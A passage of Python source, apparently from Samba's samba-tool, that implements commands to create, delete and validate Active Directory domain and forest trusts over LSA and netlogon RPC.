raise self.LocalRuntimeError(self, error, "lsaRQueryForestTrustInformation failed")
local_tdo_forest = lsa.ForestTrustInformation()
local_tdo_forest.count = 0
local_tdo_forest.entries = []
self.outf.write("TrustedDomain:\n\n")
self.outf.write("NetbiosName: %s\n" % local_tdo_info.netbios_name.string)
if local_tdo_info.netbios_name.string != local_tdo_info.domain_name.string:
self.outf.write("DnsName: %s\n" % local_tdo_info.domain_name.string)
self.outf.write("SID: %s\n" % local_tdo_info.sid)
self.outf.write("Type: %s\n" % self.trustType_string(local_tdo_info.trust_type))
self.outf.write("Direction: %s\n" % self.trustDirection_string(local_tdo_info.trust_direction))
self.outf.write("Attributes: %s\n" % self.trustAttributes_string(local_tdo_info.trust_attributes))
posix_offset_u32 = ctypes.c_uint32(local_tdo_posix.posix_offset).value
posix_offset_i32 = ctypes.c_int32(local_tdo_posix.posix_offset).value
self.outf.write("PosixOffset: 0x%08X (%d)\n" % (posix_offset_u32, posix_offset_i32))
self.outf.write("kerb_EncTypes: %s\n" % self.kerb_EncTypes_string(local_tdo_enctypes.enc_types))
if local_tdo_info.trust_attributes & lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE:
self.write_forest_trust_info(local_tdo_forest,
tln=local_tdo_info.domain_name.string)
return
class cmd_domain_trust_create(DomainTrustCommand):
"""Create a domain or forest trust."""
synopsis = "%prog DOMAIN [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
"localdcopts": LocalDCCredentialsOptions,
}
takes_options = [
Option("--type", type="choice", metavar="TYPE",
choices=["external", "forest"],
help="The type of the trust: 'external' or 'forest'.",
dest='trust_type',
default="external"),
Option("--direction", type="choice", metavar="DIRECTION",
choices=["incoming", "outgoing", "both"],
help="The trust direction: 'incoming', 'outgoing' or 'both'.",
dest='trust_direction',
default="both"),
Option("--create-location", type="choice", metavar="LOCATION",
choices=["local", "both"],
help="Where to create the trusted domain object: 'local' or 'both'.",
dest='create_location',
default="both"),
Option("--cross-organisation", action="store_true",
help="The related domains does not belong to the same organisation.",
dest='cross_organisation',
default=False),
Option("--quarantined", type="choice", metavar="yes|no",
choices=["yes", "no", None],
help="Special SID filtering rules are applied to the trust. "
"With --type=external the default is yes. "
"With --type=forest the default is no.",
dest='quarantined_arg',
default=None),
Option("--not-transitive", action="store_true",
help="The forest trust is not transitive.",
dest='not_transitive',
default=False),
Option("--treat-as-external", action="store_true",
help="The treat the forest trust as external.",
dest='treat_as_external',
default=False),
Option("--no-aes-keys", action="store_false",
help="The trust uses aes kerberos keys.",
dest='use_aes_keys',
default=True),
Option("--skip-validation", action="store_false",
help="Skip validation of the trust.",
dest='validate',
default=True),
]
takes_args = ["domain"]
def run(self, domain, sambaopts=None, localdcopts=None, credopts=None, versionopts=None,
trust_type=None, trust_direction=None, create_location=None,
cross_organisation=False, quarantined_arg=None,
not_transitive=False, treat_as_external=False,
use_aes_keys=False, validate=True):
lsaString = lsa.String()
quarantined = False
if quarantined_arg is None:
if trust_type == 'external':
quarantined = True
elif quarantined_arg == 'yes':
quarantined = True
if trust_type != 'forest':
if not_transitive:
raise CommandError("--not-transitive requires --type=forest")
if treat_as_external:
raise CommandError("--treat-as-external requires --type=forest")
enc_types = None
if use_aes_keys:
enc_types = lsa.TrustDomainInfoSupportedEncTypes()
enc_types.enc_types = security.KERB_ENCTYPE_AES128_CTS_HMAC_SHA1_96
enc_types.enc_types |= security.KERB_ENCTYPE_AES256_CTS_HMAC_SHA1_96
local_policy_access = lsa.LSA_POLICY_VIEW_LOCAL_INFORMATION
local_policy_access |= lsa.LSA_POLICY_TRUST_ADMIN
local_policy_access |= lsa.LSA_POLICY_CREATE_SECRET
local_trust_info = lsa.TrustDomainInfoInfoEx()
local_trust_info.trust_type = lsa.LSA_TRUST_TYPE_UPLEVEL
local_trust_info.trust_direction = 0
if trust_direction == "both":
local_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_INBOUND
local_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_OUTBOUND
elif trust_direction == "incoming":
local_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_INBOUND
elif trust_direction == "outgoing":
local_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_OUTBOUND
local_trust_info.trust_attributes = 0
if cross_organisation:
local_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_CROSS_ORGANIZATION
if quarantined:
local_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_QUARANTINED_DOMAIN
if trust_type == "forest":
local_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE
if not_transitive:
local_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_NON_TRANSITIVE
if treat_as_external:
local_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL
def get_password(name):
password = None
while True:
if password is not None and password != '':
return password
password = getpass("New %s Password: " % name)
passwordverify = getpass("Retype %s Password: " % name)
if not password == passwordverify:
password = None
self.outf.write("Sorry, passwords do not match.\n")
incoming_secret = None
outgoing_secret = None
remote_policy_access = lsa.LSA_POLICY_VIEW_LOCAL_INFORMATION
if create_location == "local":
if local_trust_info.trust_direction & lsa.LSA_TRUST_DIRECTION_INBOUND:
incoming_password = get_password("Incoming Trust")
incoming_secret = string_to_byte_array(incoming_password.encode('utf-16-le'))
if local_trust_info.trust_direction & lsa.LSA_TRUST_DIRECTION_OUTBOUND:
outgoing_password = get_password("Outgoing Trust")
outgoing_secret = string_to_byte_array(outgoing_password.encode('utf-16-le'))
remote_trust_info = None
else:
# We use 240 random bytes.
# Windows uses 28 or 240 random bytes. I guess it's
# based on the trust type external vs. forest.
#
# The initial trust password can be up to 512 bytes
# while the versioned passwords used for periodic updates
# can only be up to 498 bytes, as netr_ServerPasswordSet2()
# needs to pass the NL_PASSWORD_VERSION structure within the
# 512 bytes and a 2 bytes confounder is required.
#
def random_trust_secret(length):
pw = samba.generate_random_machine_password(length // 2, length // 2)
return string_to_byte_array(pw.encode('utf-16-le'))
if local_trust_info.trust_direction & lsa.LSA_TRUST_DIRECTION_INBOUND:
incoming_secret = random_trust_secret(240)
if local_trust_info.trust_direction & lsa.LSA_TRUST_DIRECTION_OUTBOUND:
outgoing_secret = random_trust_secret(240)
remote_policy_access |= lsa.LSA_POLICY_TRUST_ADMIN
remote_policy_access |= lsa.LSA_POLICY_CREATE_SECRET
remote_trust_info = lsa.TrustDomainInfoInfoEx()
remote_trust_info.trust_type = lsa.LSA_TRUST_TYPE_UPLEVEL
remote_trust_info.trust_direction = 0
if trust_direction == "both":
remote_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_INBOUND
remote_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_OUTBOUND
elif trust_direction == "incoming":
remote_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_OUTBOUND
elif trust_direction == "outgoing":
remote_trust_info.trust_direction |= lsa.LSA_TRUST_DIRECTION_INBOUND
remote_trust_info.trust_attributes = 0
if cross_organisation:
remote_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_CROSS_ORGANIZATION
if quarantined:
remote_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_QUARANTINED_DOMAIN
if trust_type == "forest":
remote_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE
if not_transitive:
remote_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_NON_TRANSITIVE
if treat_as_external:
remote_trust_info.trust_attributes |= lsa.LSA_TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL
local_server = self.setup_local_server(sambaopts, localdcopts)
try:
local_lsa = self.new_local_lsa_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect lsa server")
try:
(local_policy, local_lsa_info) = self.get_lsa_info(local_lsa, local_policy_access)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to query LSA_POLICY_INFO_DNS")
self.outf.write("LocalDomain Netbios[%s] DNS[%s] SID[%s]\n" % (
local_lsa_info.name.string,
local_lsa_info.dns_domain.string,
local_lsa_info.sid))
try:
remote_server = self.setup_remote_server(credopts, domain)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to locate remote server")
try:
remote_lsa = self.new_remote_lsa_connection()
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to connect lsa server")
try:
(remote_policy, remote_lsa_info) = self.get_lsa_info(remote_lsa, remote_policy_access)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to query LSA_POLICY_INFO_DNS")
self.outf.write("RemoteDomain Netbios[%s] DNS[%s] SID[%s]\n" % (
remote_lsa_info.name.string,
remote_lsa_info.dns_domain.string,
remote_lsa_info.sid))
local_trust_info.domain_name.string = remote_lsa_info.dns_domain.string
local_trust_info.netbios_name.string = remote_lsa_info.name.string
local_trust_info.sid = remote_lsa_info.sid
if remote_trust_info:
remote_trust_info.domain_name.string = local_lsa_info.dns_domain.string
remote_trust_info.netbios_name.string = local_lsa_info.name.string
remote_trust_info.sid = local_lsa_info.sid
try:
lsaString.string = local_trust_info.domain_name.string
local_old_netbios = \
local_lsa.QueryTrustedDomainInfoByName(local_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_FULL_INFO)
raise CommandError("TrustedDomain %s already exist'" % lsaString.string)
except NTSTATUSError as error:
if not self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise self.LocalRuntimeError(self, error,
"QueryTrustedDomainInfoByName(%s, FULL_INFO) failed" % (
lsaString.string))
try:
lsaString.string = local_trust_info.netbios_name.string
local_old_dns = \
local_lsa.QueryTrustedDomainInfoByName(local_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_FULL_INFO)
raise CommandError("TrustedDomain %s already exist'" % lsaString.string)
except NTSTATUSError as error:
if not self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise self.LocalRuntimeError(self, error,
"QueryTrustedDomainInfoByName(%s, FULL_INFO) failed" % (
lsaString.string))
if remote_trust_info:
try:
lsaString.string = remote_trust_info.domain_name.string
remote_old_netbios = \
remote_lsa.QueryTrustedDomainInfoByName(remote_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_FULL_INFO)
raise CommandError("TrustedDomain %s already exist'" % lsaString.string)
except NTSTATUSError as error:
if not self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise self.RemoteRuntimeError(self, error,
"QueryTrustedDomainInfoByName(%s, FULL_INFO) failed" % (
lsaString.string))
try:
lsaString.string = remote_trust_info.netbios_name.string
remote_old_dns = \
remote_lsa.QueryTrustedDomainInfoByName(remote_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_FULL_INFO)
raise CommandError("TrustedDomain %s already exist'" % lsaString.string)
except NTSTATUSError as error:
if not self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise self.RemoteRuntimeError(self, error,
"QueryTrustedDomainInfoByName(%s, FULL_INFO) failed" % (
lsaString.string))
try:
local_netlogon = self.new_local_netlogon_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect netlogon server")
try:
local_netlogon_info = self.get_netlogon_dc_info(local_netlogon, local_server)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to get netlogon dc info")
if remote_trust_info:
try:
remote_netlogon = self.new_remote_netlogon_connection()
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to connect netlogon server")
try:
remote_netlogon_dc_unc = self.get_netlogon_dc_unc(remote_netlogon,
remote_server, domain)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to get netlogon dc info")
def generate_AuthInOutBlob(secret, update_time):
if secret is None:
blob = drsblobs.trustAuthInOutBlob()
blob.count = 0
return blob
clear = drsblobs.AuthInfoClear()
clear.size = len(secret)
clear.password = secret
info = drsblobs.AuthenticationInformation()
info.LastUpdateTime = samba.unix2nttime(update_time)
info.AuthType = lsa.TRUST_AUTH_TYPE_CLEAR
info.AuthInfo = clear
array = drsblobs.AuthenticationInformationArray()
array.count = 1
array.array = [info]
blob = drsblobs.trustAuthInOutBlob()
blob.count = 1
blob.current = array
return blob
def generate_AuthInfoInternal(session_key, incoming=None, outgoing=None):
confounder = [0] * 512
for i in range(len(confounder)):
confounder[i] = random.randint(0, 255)
trustpass = drsblobs.trustDomainPasswords()
trustpass.confounder = confounder
trustpass.outgoing = outgoing
trustpass.incoming = incoming
trustpass_blob = ndr_pack(trustpass)
encrypted_trustpass = arcfour_encrypt(session_key, trustpass_blob)
auth_blob = lsa.DATA_BUF2()
auth_blob.size = len(encrypted_trustpass)
auth_blob.data = string_to_byte_array(encrypted_trustpass)
auth_info = lsa.TrustDomainInfoAuthInfoInternal()
auth_info.auth_blob = auth_blob
return auth_info
update_time = samba.current_unix_time()
incoming_blob = generate_AuthInOutBlob(incoming_secret, update_time)
outgoing_blob = generate_AuthInOutBlob(outgoing_secret, update_time)
local_tdo_handle = None
remote_tdo_handle = None
local_auth_info = generate_AuthInfoInternal(local_lsa.session_key,
incoming=incoming_blob,
outgoing=outgoing_blob)
if remote_trust_info:
remote_auth_info = generate_AuthInfoInternal(remote_lsa.session_key,
incoming=outgoing_blob,
outgoing=incoming_blob)
try:
if remote_trust_info:
self.outf.write("Creating remote TDO.\n")
current_request = {"location": "remote", "name": "CreateTrustedDomainEx2"}
remote_tdo_handle = \
remote_lsa.CreateTrustedDomainEx2(remote_policy,
remote_trust_info,
remote_auth_info,
lsa.LSA_TRUSTED_DOMAIN_ALL_ACCESS)
self.outf.write("Remote TDO created.\n")
if enc_types:
self.outf.write("Setting supported encryption types on remote TDO.\n")
current_request = {"location": "remote", "name": "SetInformationTrustedDomain"}
remote_lsa.SetInformationTrustedDomain(remote_tdo_handle,
lsa.LSA_TRUSTED_DOMAIN_SUPPORTED_ENCRYPTION_TYPES,
enc_types)
self.outf.write("Creating local TDO.\n")
current_request = {"location": "local", "name": "CreateTrustedDomainEx2"}
local_tdo_handle = local_lsa.CreateTrustedDomainEx2(local_policy,
local_trust_info,
local_auth_info,
lsa.LSA_TRUSTED_DOMAIN_ALL_ACCESS)
self.outf.write("Local TDO created\n")
if enc_types:
self.outf.write("Setting supported encryption types on local TDO.\n")
current_request = {"location": "local", "name": "SetInformationTrustedDomain"}
local_lsa.SetInformationTrustedDomain(local_tdo_handle,
lsa.LSA_TRUSTED_DOMAIN_SUPPORTED_ENCRYPTION_TYPES,
enc_types)
except RuntimeError as error:
self.outf.write("Error: %s failed %sly - cleaning up\n" % (
current_request['name'], current_request['location']))
if remote_tdo_handle:
self.outf.write("Deleting remote TDO.\n")
remote_lsa.DeleteObject(remote_tdo_handle)
remote_tdo_handle = None
if local_tdo_handle:
self.outf.write("Deleting local TDO.\n")
local_lsa.DeleteObject(local_tdo_handle)
local_tdo_handle = None
if current_request['location'] == "remote":
raise self.RemoteRuntimeError(self, error, "%s" % (
current_request['name']))
raise self.LocalRuntimeError(self, error, "%s" % (
current_request['name']))
if validate:
if local_trust_info.trust_attributes & lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE:
self.outf.write("Setup local forest trust information...\n")
try:
# get all information about the remote trust
# this triggers netr_GetForestTrustInformation to the remote domain
# and lsaRSetForestTrustInformation() locally, but new top level
# names are disabled by default.
local_forest_info = \
local_netlogon.netr_DsRGetForestTrustInformation(local_netlogon_info.dc_unc,
remote_lsa_info.dns_domain.string,
netlogon.DS_GFTI_UPDATE_TDO)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "netr_DsRGetForestTrustInformation() failed")
try:
# here we try to enable all top level names
local_forest_collision = \
local_lsa.lsaRSetForestTrustInformation(local_policy,
remote_lsa_info.dns_domain,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO,
local_forest_info,
0)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "lsaRSetForestTrustInformation() failed")
self.write_forest_trust_info(local_forest_info,
tln=remote_lsa_info.dns_domain.string,
collisions=local_forest_collision)
if remote_trust_info:
self.outf.write("Setup remote forest trust information...\n")
try:
# get all information about the local trust (from the perspective of the remote domain)
# this triggers netr_GetForestTrustInformation to our domain.
# and lsaRSetForestTrustInformation() remotely, but new top level
# names are disabled by default.
remote_forest_info = \
remote_netlogon.netr_DsRGetForestTrustInformation(remote_netlogon_dc_unc,
local_lsa_info.dns_domain.string,
netlogon.DS_GFTI_UPDATE_TDO)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "netr_DsRGetForestTrustInformation() failed")
try:
# here we try to enable all top level names
remote_forest_collision = \
remote_lsa.lsaRSetForestTrustInformation(remote_policy,
local_lsa_info.dns_domain,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO,
remote_forest_info,
0)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "lsaRSetForestTrustInformation() failed")
self.write_forest_trust_info(remote_forest_info,
tln=local_lsa_info.dns_domain.string,
collisions=remote_forest_collision)
if local_trust_info.trust_direction & lsa.LSA_TRUST_DIRECTION_OUTBOUND:
self.outf.write("Validating outgoing trust...\n")
try:
local_trust_verify = local_netlogon.netr_LogonControl2Ex(local_netlogon_info.dc_unc,
netlogon.NETLOGON_CONTROL_TC_VERIFY,
2,
remote_lsa_info.dns_domain.string)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "NETLOGON_CONTROL_TC_VERIFY failed")
local_trust_status = self._uint32(local_trust_verify.pdc_connection_status[0])
local_conn_status = self._uint32(local_trust_verify.tc_connection_status[0])
if local_trust_verify.flags & netlogon.NETLOGON_VERIFY_STATUS_RETURNED:
local_validation = "LocalValidation: DC[%s] CONNECTION[%s] TRUST[%s] VERIFY_STATUS_RETURNED" % (
local_trust_verify.trusted_dc_name,
local_trust_verify.tc_connection_status[1],
local_trust_verify.pdc_connection_status[1])
else:
local_validation = "LocalValidation: DC[%s] CONNECTION[%s] TRUST[%s]" % (
local_trust_verify.trusted_dc_name,
local_trust_verify.tc_connection_status[1],
local_trust_verify.pdc_connection_status[1])
if local_trust_status != werror.WERR_SUCCESS or local_conn_status != werror.WERR_SUCCESS:
raise CommandError(local_validation)
else:
self.outf.write("OK: %s\n" % local_validation)
if remote_trust_info:
if remote_trust_info.trust_direction & lsa.LSA_TRUST_DIRECTION_OUTBOUND:
self.outf.write("Validating incoming trust...\n")
try:
remote_trust_verify = \
remote_netlogon.netr_LogonControl2Ex(remote_netlogon_dc_unc,
netlogon.NETLOGON_CONTROL_TC_VERIFY,
2,
local_lsa_info.dns_domain.string)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "NETLOGON_CONTROL_TC_VERIFY failed")
remote_trust_status = self._uint32(remote_trust_verify.pdc_connection_status[0])
remote_conn_status = self._uint32(remote_trust_verify.tc_connection_status[0])
if remote_trust_verify.flags & netlogon.NETLOGON_VERIFY_STATUS_RETURNED:
remote_validation = "RemoteValidation: DC[%s] CONNECTION[%s] TRUST[%s] VERIFY_STATUS_RETURNED" % (
remote_trust_verify.trusted_dc_name,
remote_trust_verify.tc_connection_status[1],
remote_trust_verify.pdc_connection_status[1])
else:
remote_validation = "RemoteValidation: DC[%s] CONNECTION[%s] TRUST[%s]" % (
remote_trust_verify.trusted_dc_name,
remote_trust_verify.tc_connection_status[1],
remote_trust_verify.pdc_connection_status[1])
if remote_trust_status != werror.WERR_SUCCESS or remote_conn_status != werror.WERR_SUCCESS:
raise CommandError(remote_validation)
else:
self.outf.write("OK: %s\n" % remote_validation)
if remote_tdo_handle is not None:
try:
remote_lsa.Close(remote_tdo_handle)
except RuntimeError as error:
pass
remote_tdo_handle = None
if local_tdo_handle is not None:
try:
local_lsa.Close(local_tdo_handle)
except RuntimeError as error:
pass
local_tdo_handle = None
self.outf.write("Success.\n")
return
class cmd_domain_trust_delete(DomainTrustCommand):
"""Delete a domain trust."""
synopsis = "%prog DOMAIN [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
"localdcopts": LocalDCCredentialsOptions,
}
takes_options = [
Option("--delete-location", type="choice", metavar="LOCATION",
choices=["local", "both"],
help="Where to delete the trusted domain object: 'local' or 'both'.",
dest='delete_location',
default="both"),
]
takes_args = ["domain"]
def run(self, domain, sambaopts=None, localdcopts=None, credopts=None, versionopts=None,
delete_location=None):
local_policy_access = lsa.LSA_POLICY_VIEW_LOCAL_INFORMATION
local_policy_access |= lsa.LSA_POLICY_TRUST_ADMIN
local_policy_access |= lsa.LSA_POLICY_CREATE_SECRET
if delete_location == "local":
remote_policy_access = None
else:
remote_policy_access = lsa.LSA_POLICY_VIEW_LOCAL_INFORMATION
remote_policy_access |= lsa.LSA_POLICY_TRUST_ADMIN
remote_policy_access |= lsa.LSA_POLICY_CREATE_SECRET
local_server = self.setup_local_server(sambaopts, localdcopts)
try:
local_lsa = self.new_local_lsa_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect lsa server")
try:
(local_policy, local_lsa_info) = self.get_lsa_info(local_lsa, local_policy_access)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to query LSA_POLICY_INFO_DNS")
self.outf.write("LocalDomain Netbios[%s] DNS[%s] SID[%s]\n" % (
local_lsa_info.name.string,
local_lsa_info.dns_domain.string,
local_lsa_info.sid))
local_tdo_info = None
local_tdo_handle = None
remote_tdo_info = None
remote_tdo_handle = None
lsaString = lsa.String()
try:
lsaString.string = domain
local_tdo_info = local_lsa.QueryTrustedDomainInfoByName(local_policy,
lsaString, lsa.LSA_TRUSTED_DOMAIN_INFO_INFO_EX)
except NTSTATUSError as error:
if self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise CommandError("Failed to find trust for domain '%s'" % domain)
raise self.RemoteRuntimeError(self, error, "failed to locate remote server")
if remote_policy_access is not None:
try:
remote_server = self.setup_remote_server(credopts, domain)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to locate remote server")
try:
remote_lsa = self.new_remote_lsa_connection()
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to connect lsa server")
try:
(remote_policy, remote_lsa_info) = self.get_lsa_info(remote_lsa, remote_policy_access)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to query LSA_POLICY_INFO_DNS")
self.outf.write("RemoteDomain Netbios[%s] DNS[%s] SID[%s]\n" % (
remote_lsa_info.name.string,
remote_lsa_info.dns_domain.string,
remote_lsa_info.sid))
if remote_lsa_info.sid != local_tdo_info.sid or \
remote_lsa_info.name.string != local_tdo_info.netbios_name.string or \
remote_lsa_info.dns_domain.string != local_tdo_info.domain_name.string:
raise CommandError("LocalTDO inconsistend: Netbios[%s] DNS[%s] SID[%s]" % (
local_tdo_info.netbios_name.string,
local_tdo_info.domain_name.string,
local_tdo_info.sid))
try:
lsaString.string = local_lsa_info.dns_domain.string
remote_tdo_info = \
remote_lsa.QueryTrustedDomainInfoByName(remote_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_INFO_EX)
except NTSTATUSError as error:
if not self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise self.RemoteRuntimeError(self, error, "QueryTrustedDomainInfoByName(%s)" % (
lsaString.string))
pass
if remote_tdo_info is not None:
if local_lsa_info.sid != remote_tdo_info.sid or \
local_lsa_info.name.string != remote_tdo_info.netbios_name.string or \
local_lsa_info.dns_domain.string != remote_tdo_info.domain_name.string:
raise CommandError("RemoteTDO inconsistend: Netbios[%s] DNS[%s] SID[%s]" % (
remote_tdo_info.netbios_name.string,
remote_tdo_info.domain_name.string,
remote_tdo_info.sid))
if local_tdo_info is not None:
try:
lsaString.string = local_tdo_info.domain_name.string
local_tdo_handle = \
local_lsa.OpenTrustedDomainByName(local_policy,
lsaString,
security.SEC_STD_DELETE)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "OpenTrustedDomainByName(%s)" % (
lsaString.string))
local_lsa.DeleteObject(local_tdo_handle)
local_tdo_handle = None
if remote_tdo_info is not None:
try:
lsaString.string = remote_tdo_info.domain_name.string
remote_tdo_handle = \
remote_lsa.OpenTrustedDomainByName(remote_policy,
lsaString,
security.SEC_STD_DELETE)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "OpenTrustedDomainByName(%s)" % (
lsaString.string))
if remote_tdo_handle is not None:
try:
remote_lsa.DeleteObject(remote_tdo_handle)
remote_tdo_handle = None
self.outf.write("RemoteTDO deleted.\n")
except RuntimeError as error:
self.outf.write("%s\n" % self.RemoteRuntimeError(self, error, "DeleteObject() failed"))
if local_tdo_handle is not None:
try:
local_lsa.DeleteObject(local_tdo_handle)
local_tdo_handle = None
self.outf.write("LocalTDO deleted.\n")
except RuntimeError as error:
self.outf.write("%s\n" % self.LocalRuntimeError(self, error, "DeleteObject() failed"))
return
class cmd_domain_trust_validate(DomainTrustCommand):
"""Validate a domain trust."""
synopsis = "%prog DOMAIN [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
"localdcopts": LocalDCCredentialsOptions,
}
takes_options = [
Option("--validate-location", type="choice", metavar="LOCATION",
choices=["local", "both"],
help="Where to validate the trusted domain object: 'local' or 'both'.",
dest='validate_location',
default="both"),
]
takes_args = ["domain"]
def run(self, domain, sambaopts=None, versionopts=None, credopts=None, localdcopts=None,
validate_location=None):
local_policy_access = lsa.LSA_POLICY_VIEW_LOCAL_INFORMATION
local_server = self.setup_local_server(sambaopts, localdcopts)
try:
local_lsa = self.new_local_lsa_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect lsa server")
try:
(local_policy, local_lsa_info) = self.get_lsa_info(local_lsa, local_policy_access)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to query LSA_POLICY_INFO_DNS")
self.outf.write("LocalDomain Netbios[%s] DNS[%s] SID[%s]\n" % (
local_lsa_info.name.string,
local_lsa_info.dns_domain.string,
local_lsa_info.sid))
try:
lsaString = lsa.String()
lsaString.string = domain
local_tdo_info = \
local_lsa.QueryTrustedDomainInfoByName(local_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_INFO_EX)
except NTSTATUSError as error:
if self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise CommandError("trusted domain object does not exist for domain [%s]" % domain)
raise self.LocalRuntimeError(self, error, "QueryTrustedDomainInfoByName(INFO_EX) failed")
self.outf.write("LocalTDO Netbios[%s] DNS[%s] SID[%s]\n" % (
local_tdo_info.netbios_name.string,
local_tdo_info.domain_name.string,
local_tdo_info.sid))
try:
local_netlogon = self.new_local_netlogon_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect netlogon server")
try:
local_trust_verify = \
local_netlogon.netr_LogonControl2Ex(local_server,
netlogon.NETLOGON_CONTROL_TC_VERIFY,
2,
local_tdo_info.domain_name.string)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "NETLOGON_CONTROL_TC_VERIFY failed")
local_trust_status = self._uint32(local_trust_verify.pdc_connection_status[0])
local_conn_status = self._uint32(local_trust_verify.tc_connection_status[0])
if local_trust_verify.flags & netlogon.NETLOGON_VERIFY_STATUS_RETURNED:
local_validation = "LocalValidation: DC[%s] CONNECTION[%s] TRUST[%s] VERIFY_STATUS_RETURNED" % (
local_trust_verify.trusted_dc_name,
local_trust_verify.tc_connection_status[1],
local_trust_verify.pdc_connection_status[1])
else:
local_validation = "LocalValidation: DC[%s] CONNECTION[%s] TRUST[%s]" % (
local_trust_verify.trusted_dc_name,
local_trust_verify.tc_connection_status[1],
local_trust_verify.pdc_connection_status[1])
if local_trust_status != werror.WERR_SUCCESS or local_conn_status != werror.WERR_SUCCESS:
raise CommandError(local_validation)
else:
self.outf.write("OK: %s\n" % local_validation)
try:
server = local_trust_verify.trusted_dc_name.replace('\\', '')
domain_and_server = "%s\\%s" % (local_tdo_info.domain_name.string, server)
local_trust_rediscover = \
local_netlogon.netr_LogonControl2Ex(local_server,
netlogon.NETLOGON_CONTROL_REDISCOVER,
2,
domain_and_server)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "NETLOGON_CONTROL_REDISCOVER failed")
local_conn_status = self._uint32(local_trust_rediscover.tc_connection_status[0])
local_rediscover = "LocalRediscover: DC[%s] CONNECTION[%s]" % (
local_trust_rediscover.trusted_dc_name,
local_trust_rediscover.tc_connection_status[1])
if local_conn_status != werror.WERR_SUCCESS:
raise CommandError(local_rediscover)
else:
self.outf.write("OK: %s\n" % local_rediscover)
if validate_location != "local":
try:
remote_server = self.setup_remote_server(credopts, domain, require_pdc=False)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to locate remote server")
try:
remote_netlogon = self.new_remote_netlogon_connection()
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to connect netlogon server")
try:
remote_trust_verify = \
remote_netlogon.netr_LogonControl2Ex(remote_server,
netlogon.NETLOGON_CONTROL_TC_VERIFY,
2,
local_lsa_info.dns_domain.string)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "NETLOGON_CONTROL_TC_VERIFY failed")
remote_trust_status = self._uint32(remote_trust_verify.pdc_connection_status[0])
remote_conn_status = self._uint32(remote_trust_verify.tc_connection_status[0])
